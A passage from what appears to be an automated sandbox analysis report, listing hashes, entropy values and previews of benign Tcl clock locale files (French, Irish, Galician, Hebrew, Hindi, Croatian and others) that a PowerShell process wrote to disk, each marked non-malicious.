                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1033
                                                                                                                                                                                                                              Entropy (8bit):4.15884265510429
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR834YPxTSBFSa+E6rIsmYmyAxyIQbXHU92W1T:43a6rIyAE0B
                                                                                                                                                                                                                              MD5:5D224E66FD9521CA4327D4F164CD6585
                                                                                                                                                                                                                              SHA1:FC8F4C1D9A69931679028DE02155D96A18F6542E
                                                                                                                                                                                                                              SHA-256:2EC9B03469FA38B260915C93318F446EA5E12B9090BD441936B57552EBA1E3C9
                                                                                                                                                                                                                              SHA-512:0E0F97D99F0274A8A92AA7DC992B252A0BB696D69A8835602D8F4C03A6A15780F45971F00863436949CD81AD7DF6EE6BC463CE5B9FECF5E39508BA4D4E83C693
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fo DAYS_OF_WEEK_ABBREV [list \.. "sun"\.. "m\u00e1n"\.. "t\u00fds"\.. "mik"\.. "h\u00f3s"\.. "fr\u00ed"\.. "ley"].. ::msgcat::mcset fo DAYS_OF_WEEK_FULL [list \.. "sunnudagur"\.. "m\u00e1nadagur"\.. "t\u00fdsdagur"\.. "mikudagur"\.. "h\u00f3sdagur"\.. "fr\u00edggjadagur"\.. "leygardagur"].. ::msgcat::mcset fo MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset fo MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "apr\u00edl"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.864028070948858
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoZA4WjoZd3vLjoZd3v6mjoZd+3vnFDoAkvn:4EnLB3831P23vS3v6u3v9dmn
                                                                                                                                                                                                                              MD5:92E2B6483B2374817548F4EAA1731820
                                                                                                                                                                                                                              SHA1:071E1E9368CCB4EC864E78622B2113F460920203
                                                                                                                                                                                                                              SHA-256:C3DCCF5E5904C24D4AD9AAA36160A78F5397A7452510C0C0E61DE4DE863305CB
                                                                                                                                                                                                                              SHA-512:E79D4D38A22298252FA46D15C383CFB2A1E49E8196C265A58F9BA4982DFD9CE29E87C0B85BE3F39617359451831B792FCD3092A52EDF8FFD999AFE5CFE1D170D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fo_FO DATE_FORMAT "%d/%m-%Y".. ::msgcat::mcset fo_FO TIME_FORMAT "%T".. ::msgcat::mcset fo_FO TIME_FORMAT_12 "%T".. ::msgcat::mcset fo_FO DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1257
                                                                                                                                                                                                                              Entropy (8bit):4.383721663740675
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR835LzAX2t6KOkPwzZIGzRmzQf1waGqHvivh:43mlwIFZtA/qPkh
                                                                                                                                                                                                                              MD5:4D63B4A7CF13A28A6F6784B5597EEF43
                                                                                                                                                                                                                              SHA1:FE1B35A93CB72666D7D6BC37D9BE081B05A00CD9
                                                                                                                                                                                                                              SHA-256:96B1E1E12CD13A56722EBF27D362C70B467342FA1282A40B89FB16B5105A0480
                                                                                                                                                                                                                              SHA-512:5647CAE859B62C7CE1CEE6426A076361D2A29EFE6B6F311DDC0E7D006194BA68D575852FEC5FDE2AB43DF8AE440C57013D32A3951095CB856327070FD9BD1C76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr DAYS_OF_WEEK_ABBREV [list \.. "dim."\.. "lun."\.. "mar."\.. "mer."\.. "jeu."\.. "ven."\.. "sam."].. ::msgcat::mcset fr DAYS_OF_WEEK_FULL [list \.. "dimanche"\.. "lundi"\.. "mardi"\.. "mercredi"\.. "jeudi"\.. "vendredi"\.. "samedi"].. ::msgcat::mcset fr MONTHS_ABBREV [list \.. "janv."\.. "f\u00e9vr."\.. "mars"\.. "avr."\.. "mai"\.. "juin"\.. "juil."\.. "ao\u00fbt"\.. "sept."\.. "oct."\.. "nov."\.. "d\u00e9c."\.. ""].. ::msgcat::mcset fr MONTHS_FULL [list \.. "janvier"\.. "f\u00e9vrier"\.. "mars"\.. "avril"\.. "mai"\.. "juin"\.. "juillet"\.. "ao\u00fbt"\.. "septembre"\.. "octobre"\.. "novembre"\.. "d\u00e9cembre
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.910112619660625
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoXqyFjoIX3vLjoIX3v6mjog+3vnFDoAkvn:4EnLB383AqWv3vL3v6d3v9dmn
                                                                                                                                                                                                                              MD5:07EEADB8C2F2425FF9A27E46A81827A2
                                                                                                                                                                                                                              SHA1:AA18A651C64098C7885F1F869B9F221453F42987
                                                                                                                                                                                                                              SHA-256:AAD828BCBB512FBD9902DCDD3812247A74913CC574DEB07DA95A7BBE74B1FE48
                                                                                                                                                                                                                              SHA-512:1FA60B1A69B2F5FD2C009EC18695A937C4484D7C418F7E8398D95723B857698143E0584A546F9032B75894730CBBEF78453061AC13D90199FF702E148D983C28
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr_BE DATE_FORMAT "%d/%m/%y".. ::msgcat::mcset fr_BE TIME_FORMAT "%T".. ::msgcat::mcset fr_BE TIME_FORMAT_12 "%T".. ::msgcat::mcset fr_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.890376345610709
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xooIso13vLjo13v6mjo1+3vnFDoAkvn:4EnLB383vIF3vU3v6A3v9dmn
                                                                                                                                                                                                                              MD5:2F70BDDE7685E2892C5F79C632FC2F0F
                                                                                                                                                                                                                              SHA1:FD1A6F6042E59D1563ABB5858C348C1D785C435E
                                                                                                                                                                                                                              SHA-256:0624DF9A56723DDB89E59736C20A5837DEA2206A789EBE7EEF19AD287590CA45
                                                                                                                                                                                                                              SHA-512:50FC0C91AB2C75FFC4F100C0D42DFC4B2101DB9713FD77E6FF5BF3F25A0AF4A535A4709CF4586809CEEE76C25B66ABC0DD4FD61524510C57AA0E63EA8F46E8D5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr_CA DATE_FORMAT "%Y-%m-%d".. ::msgcat::mcset fr_CA TIME_FORMAT "%T".. ::msgcat::mcset fr_CA TIME_FORMAT_12 "%T".. ::msgcat::mcset fr_CA DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):288
                                                                                                                                                                                                                              Entropy (8bit):4.913241133684606
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoFt28oF+3vLjoF+3v6mjo++3vnFDoAkvn:4EnLB383yte+3vs+3v6/3v9dmn
                                                                                                                                                                                                                              MD5:83FC7EBA68C3727F7C13C8EEAF79823F
                                                                                                                                                                                                                              SHA1:81C27F9B97F5F5190F7189230535EC09CD228158
                                                                                                                                                                                                                              SHA-256:290CA6EB74BAEAC4E2420D0755D148849F89EE87E37860F25CBB7B8AFA3EDCBC
                                                                                                                                                                                                                              SHA-512:35DA46558A246D7B3FAB02208001CE986E2E6DD88D6318AF743F4E81CA6920471D1425BB009A7476A79E7F61E1353C027B765331CD8EFA07A9E884DCB73F2195
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr_CH DATE_FORMAT "%d. %m. %y".. ::msgcat::mcset fr_CH TIME_FORMAT "%T".. ::msgcat::mcset fr_CH TIME_FORMAT_12 "%T".. ::msgcat::mcset fr_CH DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1188
                                                                                                                                                                                                                              Entropy (8bit):4.314271783103334
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR835k0CM/hlrXa754pD73/tKSx54pbIK5f2CA:43W05rXUa173/VadDA
                                                                                                                                                                                                                              MD5:67D137E5D853DB61A4B4264871E793F7
                                                                                                                                                                                                                              SHA1:4280E7F662DE792175AF8B4C93874F035F716F0F
                                                                                                                                                                                                                              SHA-256:880806867ACABD9B39E3029A5ADD26B690CC5709082D43B0959EBA725EA07AB5
                                                                                                                                                                                                                              SHA-512:C27B745143539D3E6D94BB754DCA35065CDE9B1AA6EE038D47F658175CFACC20236124D38BE5BBB03CAF8F613BD748C43CB8DFCC9234E915D18B5A477BAEF94E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ga DAYS_OF_WEEK_ABBREV [list \.. "Domh"\.. "Luan"\.. "M\u00e1irt"\.. "C\u00e9ad"\.. "D\u00e9ar"\.. "Aoine"\.. "Sath"].. ::msgcat::mcset ga DAYS_OF_WEEK_FULL [list \.. "D\u00e9 Domhnaigh"\.. "D\u00e9 Luain"\.. "D\u00e9 M\u00e1irt"\.. "D\u00e9 C\u00e9adaoin"\.. "D\u00e9ardaoin"\.. "D\u00e9 hAoine"\.. "D\u00e9 Sathairn"].. ::msgcat::mcset ga MONTHS_ABBREV [list \.. "Ean"\.. "Feabh"\.. "M\u00e1rta"\.. "Aib"\.. "Beal"\.. "Meith"\.. "I\u00fail"\.. "L\u00fan"\.. "MF\u00f3mh"\.. "DF\u00f3mh"\.. "Samh"\.. "Noll"\.. ""].. ::msgcat::mcset ga MONTHS_FULL [list \.. "Ean\u00e1ir"\.. "Feabhra"\.. "M\u00e1rta"\.. "Aibre\u00e1n"\.. "M\u00ed na Bealtaine"\.. "Meith"\..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.824539027053997
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xobHAygDobHAqo+3vLjobHAqo+3v6mjobHAy9+3vnFDoAkv:4EnLB383p23vy3v6a3v9dmn
                                                                                                                                                                                                                              MD5:C27BD7F317AAADB380F4C38AE0D2FDA6
                                                                                                                                                                                                                              SHA1:79870A0E68AA0A9B301414EDC21889F83BB81E40
                                                                                                                                                                                                                              SHA-256:3F9615C617D3CDBC1E127B3EFEE785B0CB5E92E17B7DABAC80DA2BEAF076362C
                                                                                                                                                                                                                              SHA-512:3605B9A914284CF1D3CC90DF2F21A86C0472AEE59800942DC93D842C7AE164E1DA72813787F163DC80B72269D2C391953ABAD6A8B72CCF069BEE96D418A173E9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ga_IE DATE_FORMAT "%d.%m.%y".. ::msgcat::mcset ga_IE TIME_FORMAT "%T".. ::msgcat::mcset ga_IE TIME_FORMAT_12 "%T".. ::msgcat::mcset ga_IE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):997
                                                                                                                                                                                                                              Entropy (8bit):4.120890519790248
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83okzalCcPdJ5rK8yzMY4JlV1ZDqqIkFo8w:43JkPj9K8y4HHZLIQtw
                                                                                                                                                                                                                              MD5:A3D098C1A47E380F7C25233A52FBDE38
                                                                                                                                                                                                                              SHA1:C97E4EAA9E7A7F99950F422B93C57134B532C639
                                                                                                                                                                                                                              SHA-256:34D61B49DBF9584893051FFB458D6DE9E7E2E7774AC0011F70C4DD4184EBA81C
                                                                                                                                                                                                                              SHA-512:4687AB3D2FAA65FED90678EBC08C074959E93A9FEFAF3D61EEE39DB08FD200CB57C0DDB4DDBF6451FE1EF5E07EA976EDEF830769FF403CE51734129CEF24DA9F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gl DAYS_OF_WEEK_ABBREV [list \.. "Dom"\.. "Lun"\.. "Mar"\.. "M\u00e9r"\.. "Xov"\.. "Ven"\.. "S\u00e1b"].. ::msgcat::mcset gl DAYS_OF_WEEK_FULL [list \.. "Domingo"\.. "Luns"\.. "Martes"\.. "M\u00e9rcores"\.. "Xoves"\.. "Venres"\.. "S\u00e1bado"].. ::msgcat::mcset gl MONTHS_ABBREV [list \.. "Xan"\.. "Feb"\.. "Mar"\.. "Abr"\.. "Mai"\.. "Xu\u00f1"\.. "Xul"\.. "Ago"\.. "Set"\.. "Out"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset gl MONTHS_FULL [list \.. "Xaneiro"\.. "Febreiro"\.. "Marzo"\.. "Abril"\.. "Maio"\.. "Xu\u00f1o"\.. "Xullo"\.. "Agosto"\.. "Setembro"\.. "Outubro"\.. "Novembro"\.. "Decembro"\.. ""]..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.886176304042503
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoPhkgMoPxsF3v6ay/5oPhk9+3vR6HyFvn:4EnLB383WrfK3v6ay/WJ3voSVn
                                                                                                                                                                                                                              MD5:78B9163C5E8E5E7049CBF91D1A5889A4
                                                                                                                                                                                                                              SHA1:F2F07AF3D79D61C8E0C73B13E2CA8266E10E396B
                                                                                                                                                                                                                              SHA-256:B5688CA07D713227B713655877710258CD503617E8DF79293A971649E3134F05
                                                                                                                                                                                                                              SHA-512:E86074B687670542CFA097C94D150292E1A73C9F231E92CD84386580A446569CC6F8F5817F46ED64A1D00F95D59F6F1F5D4B961DF3C8335938D83F3517794353
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gl_ES DATE_FORMAT "%d %B %Y".. ::msgcat::mcset gl_ES TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset gl_ES DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1084
                                                                                                                                                                                                                              Entropy (8bit):4.213672208102291
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR832vTXAC2/fS5JfaCroeLaCAQbSm5qJe1:43QTXs32zrf
                                                                                                                                                                                                                              MD5:518FC3964D50854081FB79189A42D3E7
                                                                                                                                                                                                                              SHA1:59392F16CD56E3E6A685F78974D539FB3A972B98
                                                                                                                                                                                                                              SHA-256:404795F2C88D0038F9ED0B5120A251D26EDF8B236E1B1698BC71ACD4DC75AC45
                                                                                                                                                                                                                              SHA-512:E5C88CAB8741D631938CEC2E0959C0FE26685C395F5F9F4F1B5C9E146E84D23D897CD7A823AB46D4B62C590AE15EC76B87EB59308ACFB1BB6F61398890B43622
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gv DAYS_OF_WEEK_ABBREV [list \.. "Jed"\.. "Jel"\.. "Jem"\.. "Jerc"\.. "Jerd"\.. "Jeh"\.. "Jes"].. ::msgcat::mcset gv DAYS_OF_WEEK_FULL [list \.. "Jedoonee"\.. "Jelhein"\.. "Jemayrt"\.. "Jercean"\.. "Jerdein"\.. "Jeheiney"\.. "Jesarn"].. ::msgcat::mcset gv MONTHS_ABBREV [list \.. "J-guer"\.. "T-arree"\.. "Mayrnt"\.. "Avrril"\.. "Boaldyn"\.. "M-souree"\.. "J-souree"\.. "Luanistyn"\.. "M-fouyir"\.. "J-fouyir"\.. "M.Houney"\.. "M.Nollick"\.. ""].. ::msgcat::mcset gv MONTHS_FULL [list \.. "Jerrey-geuree"\.. "Toshiaght-arree"\.. "Mayrnt"\.. "Averil"\.. "Boaldyn"\.. "Mean-souree"\.. "Jerrey-souree"\.. "Luanistyn"\.. "Mean-fouyir"\..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.936566750568767
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoQbtvMoQLE3v6ay/5oQbto+3vR6HyFvn:4EnLB383PbtvALE3v6ay/PbtF3voSVn
                                                                                                                                                                                                                              MD5:0B6BE614EF5F5F25A30D2D33701A9F94
                                                                                                                                                                                                                              SHA1:65800FBD73D9DAE550E04E1D818A6B9D1AEF86FE
                                                                                                                                                                                                                              SHA-256:86CABF3B9360C0E686CC4CBEB843E971C28BC6D35210ED378B54EB58CC41F3D5
                                                                                                                                                                                                                              SHA-512:376D21B38DA49A8F7C2983F2B808FD55AC9F6383BC66DF28DB99DBF61FDC9FFF8CD20F077EC3ED873EF47F0F613BDD9AD02DFFB1CB51F9A36715C7FC798C3B70
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset gv_GB DATE_FORMAT "%d %B %Y".. ::msgcat::mcset gv_GB TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset gv_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1990
                                                                                                                                                                                                                              Entropy (8bit):4.298934047406144
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83Y71LCLxL0eCLbCLKCLaCLXL7CLB0p1dLGCoCLU5LT5Gv5LJ9p5LnLEHLGCh:43sl7KqpU/nNbhbOezd2ICn
                                                                                                                                                                                                                              MD5:A0E60036EB17208A449AAFC3AAAE622C
                                                                                                                                                                                                                              SHA1:9D7479BA85FBB00A2DF2B61F4ED2CBEA8F1EC8C3
                                                                                                                                                                                                                              SHA-256:787DA79AF58872BF45AB09E3B6A920A4496B5BD8A4F3C7F010CF013EC2E8EFE0
                                                                                                                                                                                                                              SHA-512:46D12C14B5736E5EA97EB728BF58999E9D7C2CF910D8F5AFA3F5D3A86329ABF41A3E2BEBD81EE4EF64BEA0DC173B77A9FE12471C1BD9D768ED552A55B3B80213
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset he DAYS_OF_WEEK_ABBREV [list \.. "\u05d0"\.. "\u05d1"\.. "\u05d2"\.. "\u05d3"\.. "\u05d4"\.. "\u05d5"\.. "\u05e9"].. ::msgcat::mcset he DAYS_OF_WEEK_FULL [list \.. "\u05d9\u05d5\u05dd \u05e8\u05d0\u05e9\u05d5\u05df"\.. "\u05d9\u05d5\u05dd \u05e9\u05e0\u05d9"\.. "\u05d9\u05d5\u05dd \u05e9\u05dc\u05d9\u05e9\u05d9"\.. "\u05d9\u05d5\u05dd \u05e8\u05d1\u05d9\u05e2\u05d9"\.. "\u05d9\u05d5\u05dd \u05d7\u05de\u05d9\u05e9\u05d9"\.. "\u05d9\u05d5\u05dd \u05e9\u05d9\u05e9\u05d9"\.. "\u05e9\u05d1\u05ea"].. ::msgcat::mcset he MONTHS_ABBREV [list \.. "\u05d9\u05e0\u05d5"\.. "\u05e4\u05d1\u05e8"\.. "\u05de\u05e8\u05e5"\.. "\u05d0\u05e4\u05e8"\.. "\u05de\u05d0\u05d9"\.. "\u05d9\u05d5\u05e0"\.. "\u05d9\u05d5\u05dc"\.. "\u05d0\u05d5\u05d2"\..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1777
                                                                                                                                                                                                                              Entropy (8bit):4.2117128941697715
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:438n4kALqrU1fbokQTbWqrU1fbokQTw38:28OD86D8gM
                                                                                                                                                                                                                              MD5:4219A929E27308ADC04A9F368F063F38
                                                                                                                                                                                                                              SHA1:FA728EEBA8751F4CE032ED32AECFDE124D1B68E2
                                                                                                                                                                                                                              SHA-256:192F4A8E77E1627712F85533C9896EF6A040157C7BD56DF3A4A7FA56AD6746C2
                                                                                                                                                                                                                              SHA-512:223B137AC1FC15908F5541067736EF3A29493549B963393EB78660036A82982E57CFC4AD09CBD33D32A5187FF9F4ACFB5F83A0C974702434B7FAD1B2539B7F76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hi DAYS_OF_WEEK_FULL [list \.. "\u0930\u0935\u093f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0932\u0935\u093e\u0930"\.. "\u092c\u0941\u0927\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset hi MONTHS_ABBREV [list \.. "\u091c\u0928\u0935\u0930\u0940"\.. "\u092b\u093c\u0930\u0935\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u0905\u092a\u094d\u0930\u0947\u0932"\.. "\u092e\u0908"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u093e\u0908"\.. "\u0905\u0917\u0938\u094d\u0924"\.. "\u0938\u093f\u0924\u092e\u094d\u092c\u0930"\.. "\u0905\u0915\u094d\u091f\u0942\u092c\u0930"\.. "\u0928\u0935\u
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.9286948144352865
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xocv+IZoz3v6ry/5oco+3v+6f6HyFvn:4EnLB383Jvlg3v6ry/JF3vmSVn
                                                                                                                                                                                                                              MD5:1C1E1484EA0286175FADCB90937C9F34
                                                                                                                                                                                                                              SHA1:5CA1BF19021D529CB3B3A308EFFFCA7E4D073640
                                                                                                                                                                                                                              SHA-256:5A3BF0DD61BFB5A2BF75E96B11E0E3528FFAB720A0BF1923853606F8CAF0E76D
                                                                                                                                                                                                                              SHA-512:F9A43E1E18ADB6DC6B18BEDC3303A99F514DF6CA54F12100989F734233012D7D60216116915351CCACC12F6942795BF8F3BBD26B15A86E88101067D64BEE54F5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hi_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset hi_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset hi_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1171
                                                                                                                                                                                                                              Entropy (8bit):4.36311224714184
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83dVX79VIE9bLTWnh7rT+5dPcdvgrNv5KvOA1:43kmrQ7n+odIrJ6OS
                                                                                                                                                                                                                              MD5:906963A3AD09EAC781B35C190B77484E
                                                                                                                                                                                                                              SHA1:E5AA49DA9C4987EAFA839115F84612426EB8615E
                                                                                                                                                                                                                              SHA-256:105A9180BC5D23738183374FA0EA8DD80484BF3947E1432E515BDC2913C017D9
                                                                                                                                                                                                                              SHA-512:557BD1C8306750D09215D9774069A52C7D60E03DE2DF39FF909A8F658AB0565739D127E24ACDC96F736C69A71BEFA30B8A30BB489C7B7FDEA85386C802166349
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset hr DAYS_OF_WEEK_ABBREV [list \.. "ned"\.. "pon"\.. "uto"\.. "sri"\.. "\u010det"\.. "pet"\.. "sub"].. ::msgcat::mcset hr DAYS_OF_WEEK_FULL [list \.. "nedjelja"\.. "ponedjeljak"\.. "utorak"\.. "srijeda"\.. "\u010detvrtak"\.. "petak"\.. "subota"].. ::msgcat::mcset hr MONTHS_ABBREV [list \.. "sij"\.. "vel"\.. "o\u017eu"\.. "tra"\.. "svi"\.. "lip"\.. "srp"\.. "kol"\.. "ruj"\.. "lis"\.. "stu"\.. "pro"\.. ""].. ::msgcat::mcset hr MONTHS_FULL [list \.. "sije\u010danj"\.. "velja\u010da"\.. "o\u017eujak"\.. "travanj"\.. "svibanj"\.. "lipanj"\.. "srpanj"\.. "kolovoz"\.. "rujan"\.. "listopad"\.. "studeni"\.. "prosinac"\..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1381
                                                                                                                                                                                                                              Entropy (8bit):4.511450677731002
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83IFb7ZTmKrkAYm2LZyyApLDV2uZi5WF+shHUTyvtsv+:43C3ZTmKQAyZyyAp0BotK+
                                                                                                                                                                                                                              MD5:E398158EE1CD49CB5286D9642D4A61DD
                                                                                                                                                                                                                              SHA1:A93A588B0ADD198C067C4BB070DC1E5170E6E208
